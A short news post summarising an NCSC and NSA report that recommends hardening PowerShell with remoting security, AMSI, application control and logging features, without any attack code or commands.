The NCSC alongside the National Security Agency recently published a report detailing how PowerShell could be used by hostile parties and that Microsoft operators and administrators need to implement PowerShell’s built in security features to avoid abuse.
PowerShell is a scripting language and command line tool used in Microsoft devices to mange the Operating System and is usually used by cyber security defenders to by: enabling forensic efforts, improving incident response and allowing automation of common and repetitive tasks.
While PowerShell can be used to protect and assist businesses, due to its ease of use and availability, PowerShell has also been adopted by malicious attackers as a post-exploitation tool. The Authors of the report recommend not to disable PowerShell as this can hinder defensive capabilities and the operating system and to instead adjust PowerShell settings and update the application to allow it to utilise new defensive capabilities.
The authors recommended enabling the following features:
Credential and Networking of PowerShell remoting to help secure important organisational information.
Antimalware Scan Interface integration so scripts that are ran are checked for Malware (This requires AMSI-aware antivirus products e.g. Windows Defender, McAfee and Symantec).
Configuring AppLocker or Windows Defender Application Control to prevent attackers from taking over a PowerShell session and the host.
The Authors also recommend enabling the logging of PowerShell logging features like Deep Script Block Logging (DSBL), module logging and Over-the-Shoulder (OTS) transcription which will allow for continuous monitoring of PowerShell logs and can detect and alert on potential abuses.
They also recommend enabling Secure Shell to allows for public key authentication and makes remote management through PowerShell of machines convenient and secure.
Here is a table of the available features per version and operating system:
For more information and details click here to see the report.